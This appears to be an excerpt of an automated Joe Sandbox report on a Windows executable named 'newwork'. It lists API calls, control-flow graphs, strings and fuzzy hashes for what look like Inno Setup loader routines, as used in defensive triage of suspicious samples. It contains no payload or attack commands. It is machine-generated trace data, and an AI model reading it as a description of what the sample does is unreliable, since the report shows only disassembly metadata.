                                                                                        • Opcode ID: 7bc9c0c8e9dfd2478b94306391eafe1fb51b7566d8199cdbb2b2653dcbc3d95c
                                                                                        • Instruction ID: 81987b3bab642c92fe87a7372e0454594c4b8fe140ce311e0f93b1eeebf6ab37
                                                                                        • Opcode Fuzzy Hash: 7bc9c0c8e9dfd2478b94306391eafe1fb51b7566d8199cdbb2b2653dcbc3d95c
                                                                                        • Instruction Fuzzy Hash: 25412E70604204DBDB10EBA9EE89B9E37A5EB44304F10467FF510B72E2D7B89855CB9D

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0040913D,?,?,?,?,00000000,?,0040A62C), ref: 004090C4
                                                                                        • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004090CA
                                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0040913D,?,?,?,?,00000000,?,0040A62C), ref: 004090DE
                                                                                        • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004090E4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555582352.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3555526841.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555640810.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555715971.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressHandleModuleProc
                                                                                        • String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
                                                                                        • API String ID: 1646373207-2130885113
                                                                                        • Opcode ID: 0414f1d66f28dc470df4633e5994336701384173b3f6f66b470f3ad827f759f7
                                                                                        • Instruction ID: 214dda5481ef482ebe311b1329301f35405b1013d97e3062c17ffb2c8286d57d
                                                                                        • Opcode Fuzzy Hash: 0414f1d66f28dc470df4633e5994336701384173b3f6f66b470f3ad827f759f7
                                                                                        • Instruction Fuzzy Hash: 21017C70748342AEFB00BB76DD4AB163A68E785704F60457BF640BA2D3DABD4C04D66E

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040AAFE
                                                                                        • SetWindowLongA.USER32(0001041E,000000FC,00409960), ref: 0040AB15
                                                                                          • Part of subcall function 00406B7C: GetCommandLineA.KERNEL32(00000000,00406BC0,?,?,?,?,00000000,?,0040AB86,?), ref: 00406B94
                                                                                          • Part of subcall function 004099EC: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,02092474,00409AD8,00000000,00409ABF), ref: 00409A5C
                                                                                          • Part of subcall function 004099EC: CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,02092474,00409AD8,00000000), ref: 00409A70
                                                                                          • Part of subcall function 004099EC: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409A89
                                                                                          • Part of subcall function 004099EC: GetExitCodeProcess.KERNEL32(?,0040B244), ref: 00409A9B
                                                                                          • Part of subcall function 004099EC: CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,02092474,00409AD8), ref: 00409AA4
                                                                                        • RemoveDirectoryA.KERNEL32(00000000,0040AC54,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040AC01
                                                                                        • DestroyWindow.USER32(0001041E,0040AC54,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040AC15
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555582352.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3555526841.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555640810.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555715971.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$CloseCreateHandleProcess$CodeCommandDestroyDirectoryExitLineLongMultipleObjectsRemoveWait
                                                                                        • String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
                                                                                        • API String ID: 3586484885-3001827809
                                                                                        • Opcode ID: c367800830601d7b7bb1e4b9cc729c69669d466ec6c890b8506752b9ad64910a
                                                                                        • Instruction ID: d3376fcde1141b4290a3dca450fc2844fa47922897975e075ebf06e3b6db64eb
                                                                                        • Opcode Fuzzy Hash: c367800830601d7b7bb1e4b9cc729c69669d466ec6c890b8506752b9ad64910a
                                                                                        • Instruction Fuzzy Hash: 77411A71604204DFD714EBA9EE85B5A37B5EB48304F20427BF500BB2E1D7B8A855CB9D

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,02092474,00409AD8,00000000,00409ABF), ref: 00409A5C
                                                                                        • CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,02092474,00409AD8,00000000), ref: 00409A70
                                                                                        • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409A89
                                                                                        • GetExitCodeProcess.KERNEL32(?,0040B244), ref: 00409A9B
                                                                                        • CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,02092474,00409AD8), ref: 00409AA4
                                                                                          • Part of subcall function 00409648: GetLastError.KERNEL32(00000000,004096EB,?,0040B244,?,02092474), ref: 0040966C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555582352.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3555526841.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555640810.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555715971.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseHandleProcess$CodeCreateErrorExitLastMultipleObjectsWait
                                                                                        • String ID: D
                                                                                        • API String ID: 3356880605-2746444292
                                                                                        • Opcode ID: aadf6f075de5bdb3c28d757ddccd10dd30f6bbfdbbad62eb54c24073370c977f
                                                                                        • Instruction ID: b58d0f6e2b8975977e6c7b71aada5392bea55c03070ce9fad3dcef5aa6d4018a
                                                                                        • Opcode Fuzzy Hash: aadf6f075de5bdb3c28d757ddccd10dd30f6bbfdbbad62eb54c24073370c977f
                                                                                        • Instruction Fuzzy Hash: EE1142B16402486EDB00EBE6CC42F9EB7ACEF49714F50013BB604F72C6DA785D048A69

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 136 401918-40193a RtlInitializeCriticalSection 137 401946-40197c call 4012dc * 3 LocalAlloc 136->137 138 40193c-401941 RtlEnterCriticalSection 136->138 145 4019ad-4019c1 137->145 146 40197e 137->146 138->137 149 4019c3-4019c8 RtlLeaveCriticalSection 145->149 150 4019cd 145->150 148 401983-401995 146->148 148->148 151 401997-4019a6 148->151 149->150 151->145
                                                                                        APIs
                                                                                        • RtlInitializeCriticalSection.KERNEL32(0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040192E
                                                                                        • RtlEnterCriticalSection.KERNEL32(0040C41C,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 00401941
                                                                                        • LocalAlloc.KERNEL32(00000000,00000FF8,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040196B
                                                                                        • RtlLeaveCriticalSection.KERNEL32(0040C41C,004019D5,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 004019C8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555582352.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3555526841.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555640810.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555715971.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                                        • String ID:
                                                                                        • API String ID: 730355536-0
                                                                                        • Opcode ID: 38709c719971e1168baf9cdc3c67f999ad3db3ab521e9349fb3b390a12b3c6f3
                                                                                        • Instruction ID: 093a8b970c40f4dda7bd37408b901a2e20e4e29fb74a5496b56404d4d89a3717
                                                                                        • Opcode Fuzzy Hash: 38709c719971e1168baf9cdc3c67f999ad3db3ab521e9349fb3b390a12b3c6f3
                                                                                        • Instruction Fuzzy Hash: CC0161B0684240DEE715ABA999E6B353AA4E786744F10427FF080F62F2C67C4450CB9D

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 0040A878
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555582352.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3555526841.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555640810.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555715971.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Message
                                                                                        • String ID: .tmp$y@
                                                                                        • API String ID: 2030045667-2396523267
                                                                                        • Opcode ID: 55a53fbd7ad7285035f8ab2cde1915fb146aa3dc543cd9b52406218d685c1c98
                                                                                        • Instruction ID: 5e9257013af3d55ef2b6e359c41f87f67318ae2a4e6dbf07461b5d8c6de74657
                                                                                        • Opcode Fuzzy Hash: 55a53fbd7ad7285035f8ab2cde1915fb146aa3dc543cd9b52406218d685c1c98
                                                                                        • Instruction Fuzzy Hash: 3B41C030704200CFD311EF25DED1A1A77A5EB49304B214A3AF804B73E1CAB9AC11CBAD

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 0040A878
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555582352.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3555526841.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555640810.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555715971.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Message
                                                                                        • String ID: .tmp$y@
                                                                                        • API String ID: 2030045667-2396523267
                                                                                        • Opcode ID: 4e131503fe38447772e4e2294cf5373b7e2007f9fac8d76d0a71823c743fc64d
                                                                                        • Instruction ID: 95bba075cf9db07042691c1556ef0613dbe482a65a3614fff4d0ead14828e6f7
                                                                                        • Opcode Fuzzy Hash: 4e131503fe38447772e4e2294cf5373b7e2007f9fac8d76d0a71823c743fc64d
                                                                                        • Instruction Fuzzy Hash: E341BE30700200DFC711EF65DED2A1A77A5EB49304B104A3AF804B73E2CAB9AC01CBAD

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,0040941F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409376
                                                                                        • GetLastError.KERNEL32(00000000,00000000,?,00000000,0040941F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040937F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555582352.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3555526841.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555640810.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555715971.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateDirectoryErrorLast
                                                                                        • String ID: .tmp
                                                                                        • API String ID: 1375471231-2986845003
                                                                                        • Opcode ID: 1c7982c9535877cc809d76a2290e1ec991a7408e90ad789d49a53b04ffd62ed2
                                                                                        • Instruction ID: b240cf9bc22f775501a2d99da134be40bb2f76fb21a7d6e050461713caae6e8b
                                                                                        • Opcode Fuzzy Hash: 1c7982c9535877cc809d76a2290e1ec991a7408e90ad789d49a53b04ffd62ed2
                                                                                        • Instruction Fuzzy Hash: 9E216774A00208ABDB05EFA1C8429DFB7B8EF88304F50457BE901B73C2DA3C9E058A65

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 342 407749-40774a 343 4076dc-4076e6 WriteFile 342->343 344 40774c-40776f 342->344 345 4076e8-4076ea call 40748c 343->345 346 4076ef-4076f2 343->346 347 407770-407785 344->347 345->346 349 407700-407704 346->349 350 4076f4-4076fb call 4073ec 346->350 351 407787 347->351 352 4077f9 347->352 350->349 354 40778a-40778f 351->354 355 4077fd-407802 351->355 356 40783b-40783d 352->356 357 4077fb 352->357 359 407803-407819 354->359 361 407791-407792 354->361 355->359 360 407841-407843 356->360 357->355 362 40785b-40785c 359->362 370 40781b 359->370 360->362 363 407724-407741 361->363 364 407794-4077b4 361->364 366 4078d6-4078eb call 407890 InterlockedExchange 362->366 367 40785e-40788c 362->367 369 4077b5 363->369 372 407743 363->372 364->369 387 407912-407917 366->387 388 4078ed-407910 366->388 380 407820-407823 367->380 381 407890-407893 367->381 374 4077b6-4077b7 369->374 375 4077f7-4077f8 369->375 376 40781e-40781f 370->376 378 407746-407747 372->378 379 4077b9 372->379 374->379 375->352 376->380 378->342 382 4077bb-4077cd 378->382 379->382 384 407824 380->384 385 407898 380->385 381->385 382->360 386 4077cf-4077d4 382->386 389 407825 384->389 390 40789a 384->390 385->390 386->356 394 4077d6-4077de 386->394 388->387 388->388 392 407896-407897 389->392 393 407826-40782d 389->393 395 40789f 390->395 392->385 396 4078a1 393->396 397 40782f 393->397 394->347 405 4077e0 394->405 395->396 402 4078a3 396->402 403 4078ac 396->403 399 407832-407833 397->399 400 4078a5-4078aa 397->400 399->356 399->376 404 4078ae-4078af 400->404 402->400 403->404 404->395 406 4078b1-4078bd 404->406 405->375 406->385 407 4078bf-4078c0 406->407
                                                                                        APIs
                                                                                        • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004076DF
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555582352.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3555526841.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555640810.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555715971.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileWrite
                                                                                        • String ID:
                                                                                        • API String ID: 3934441357-0
                                                                                        • Opcode ID: 43d3196ec1ce5242573e8f450cfa6a0a1bc6604aabb0088ea34051851cbbaa4a
                                                                                        • Instruction ID: 20d0a63744b7af467993d3e8aec565234b7be2d060ba20bf9fd199bb98bd5a4e
                                                                                        • Opcode Fuzzy Hash: 43d3196ec1ce5242573e8f450cfa6a0a1bc6604aabb0088ea34051851cbbaa4a
                                                                                        • Instruction Fuzzy Hash: 8251D12294D2910FC7126B7849685A53FE0FE5331132E92FBC5C1AB1A3D27CA847D35B

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 408 401fd4-401fe6 409 401fe8 call 401918 408->409 410 401ffb-402010 408->410 414 401fed-401fef 409->414 412 402012-402017 RtlEnterCriticalSection 410->412 413 40201c-402025 410->413 412->413 415 402027 413->415 416 40202c-402032 413->416 414->410 417 401ff1-401ff6 414->417 415->416 418 402038-40203c 416->418 419 4020cb-4020d1 416->419 420 40214f-402158 417->420 423 402041-402050 418->423 424 40203e 418->424 421 4020d3-4020e0 419->421 422 40211d-40211f call 401ee0 419->422 425 4020e2-4020ea 421->425 426 4020ef-40211b call 402f54 421->426 432 402124-40213b 422->432 423->419 427 402052-402060 423->427 424->423 425->426 426->420 430 402062-402066 427->430 431 40207c-402080 427->431 436 402068 430->436 437 40206b-40207a 430->437 433 402082 431->433 434 402085-4020a0 431->434 440 402147 432->440 441 40213d-402142 RtlLeaveCriticalSection 432->441 433->434 439 4020a2-4020c6 call 402f54 434->439 436->437 437->439 439->420 441->440
                                                                                        APIs
                                                                                        • RtlEnterCriticalSection.KERNEL32(0040C41C,00000000,00402148), ref: 00402017
                                                                                          • Part of subcall function 00401918: RtlInitializeCriticalSection.KERNEL32(0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040192E
                                                                                          • Part of subcall function 00401918: RtlEnterCriticalSection.KERNEL32(0040C41C,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 00401941
                                                                                          • Part of subcall function 00401918: LocalAlloc.KERNEL32(00000000,00000FF8,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040196B
                                                                                          • Part of subcall function 00401918: RtlLeaveCriticalSection.KERNEL32(0040C41C,004019D5,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 004019C8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555582352.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3555526841.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555640810.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555715971.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalSection$Enter$AllocInitializeLeaveLocal
                                                                                        • String ID:
                                                                                        • API String ID: 296031713-0
                                                                                        • Opcode ID: e41243de7c80276a36dcdd2c2c0e451bb1a6f3055e5ddec7aea90b49354f7273
                                                                                        • Instruction ID: b272be6629c35a549fc4f1c5a19e6e0df2414f51bb24a7fd7fb800939d1160d0
                                                                                        • Opcode Fuzzy Hash: e41243de7c80276a36dcdd2c2c0e451bb1a6f3055e5ddec7aea90b49354f7273
                                                                                        • Instruction Fuzzy Hash: D4419CB2A40711DFDB108F69DEC562A77A0FB58314B25837AD984B73E1D378A842CB48

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 444 406fa0-406ff3 SetErrorMode call 403414 LoadLibraryA
                                                                                        APIs
                                                                                        • SetErrorMode.KERNEL32(00008000), ref: 00406FAA
                                                                                        • LoadLibraryA.KERNEL32(00000000,00000000,00406FF4,?,00000000,00407012,?,00008000), ref: 00406FD9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555582352.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3555526841.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555640810.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555715971.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLibraryLoadMode
                                                                                        • String ID:
                                                                                        • API String ID: 2987862817-0
                                                                                        • Opcode ID: 9b48b29771c4fc6652b627c4d055133170331230f079557c80f3f4e2880abe46
                                                                                        • Instruction ID: 292e1fc4e19851716b0ab93d2d43454b233f1d25ff8a05a0d03104374ea2dcbc
                                                                                        • Opcode Fuzzy Hash: 9b48b29771c4fc6652b627c4d055133170331230f079557c80f3f4e2880abe46
                                                                                        • Instruction Fuzzy Hash: D6F08270A14704BEDB129FB68C5282ABBECEB4DB0475349BAF914A26D2E53C5C209568
                                                                                        APIs
                                                                                        • SetFilePointer.KERNEL32(?,?,?,00000000), ref: 0040768B
                                                                                        • GetLastError.KERNEL32(?,?,?,00000000), ref: 00407693
                                                                                          • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,020903AC,?,0040A69B,00000001,00000000,00000002,00000000,0040AC92,?,00000000,0040ACC9), ref: 0040748F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555582352.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3555526841.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555640810.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555715971.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$FilePointer
                                                                                        • String ID:
                                                                                        • API String ID: 1156039329-0
                                                                                        • Opcode ID: cf8b3d77442686d6cce32677ffa2556d95a4d660bd32a6059a32509021572d83
                                                                                        • Instruction ID: 64daf3b7b2b4cd691f255a674f922558070816022eb0a012369b73df1192a31e
                                                                                        • Opcode Fuzzy Hash: cf8b3d77442686d6cce32677ffa2556d95a4d660bd32a6059a32509021572d83
                                                                                        • Instruction Fuzzy Hash: B2E092766081016FD600D55EC881B9B37DCDFC5364F104536B654EB2D1D679EC108776

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 448 40762c-40764a ReadFile 449 407663-40766a 448->449 450 40764c-407650 448->450 451 407652-40765a GetLastError 450->451 452 40765c-40765e call 40748c 450->452 451->449 451->452 452->449
                                                                                        APIs
                                                                                        • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 00407643
                                                                                        • GetLastError.KERNEL32(?,?,?,?,00000000), ref: 00407652
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555582352.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3555526841.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555640810.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555715971.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorFileLastRead
                                                                                        • String ID:
                                                                                        • API String ID: 1948546556-0
                                                                                        • Opcode ID: 1b4aea639ae4b78e93b9ef79541d7064bf1f98a27d237b51b731e51654b8bdcb
                                                                                        • Instruction ID: e2f452503b48da12a69c10a9d1416f2aa512a4714c212e67fea7d8588799396e
                                                                                        • Opcode Fuzzy Hash: 1b4aea639ae4b78e93b9ef79541d7064bf1f98a27d237b51b731e51654b8bdcb
                                                                                        • Instruction Fuzzy Hash: 69E012A1A081106ADB24A66E9CC5F6B6BDCCBC5724F14457BF504DB382D678DC0487BB
                                                                                        APIs
                                                                                        • SetFilePointer.KERNEL32(?,00000000,?,00000001), ref: 004075DB
                                                                                        • GetLastError.KERNEL32(?,00000000,?,00000001), ref: 004075E7
                                                                                          • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,020903AC,?,0040A69B,00000001,00000000,00000002,00000000,0040AC92,?,00000000,0040ACC9), ref: 0040748F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555582352.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3555526841.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555640810.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555715971.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$FilePointer
                                                                                        • String ID:
                                                                                        • API String ID: 1156039329-0
                                                                                        • Opcode ID: 7730a1f6a5d1c383143cef2e1ec1cb69b5af0836910a757b2920ce96cbe13b7f
                                                                                        • Instruction ID: 74cf86129294d2faf5969c20f66175129728110ffa3c668ef2bae8a95e28f18b
                                                                                        • Opcode Fuzzy Hash: 7730a1f6a5d1c383143cef2e1ec1cb69b5af0836910a757b2920ce96cbe13b7f
                                                                                        • Instruction Fuzzy Hash: C4E04FB1600210AFDB10EEB98D81B9676D89F48364F0485B6EA14DF2C6D274DC00C766
                                                                                        APIs
                                                                                        • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,00401739), ref: 0040145F
                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,00401739), ref: 00401486
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555582352.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3555526841.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555640810.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555715971.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Virtual$AllocFree
                                                                                        • String ID:
                                                                                        • API String ID: 2087232378-0
                                                                                        • Opcode ID: 2e9c029c9a25ba07e21da294550151284eb3fb058128c9ffe8d20eb9f4f906d3
                                                                                        • Instruction ID: 29306f1da17679ce7d7d3cecb65679b0075e6f6f2ddca0a826851c871ac90975
                                                                                        • Opcode Fuzzy Hash: 2e9c029c9a25ba07e21da294550151284eb3fb058128c9ffe8d20eb9f4f906d3
                                                                                        • Instruction Fuzzy Hash: 57F02772B0032057DB206A6A0CC1B636AC59F85B90F1541BBFA4CFF3F9D2B98C0042A9
                                                                                        APIs
                                                                                        • GetSystemDefaultLCID.KERNEL32(00000000,004053B6), ref: 0040529F
                                                                                          • Part of subcall function 00404CDC: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00404CF9
                                                                                          • Part of subcall function 0040520C: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052D7,?,00000000,004053B6), ref: 0040522A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555582352.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
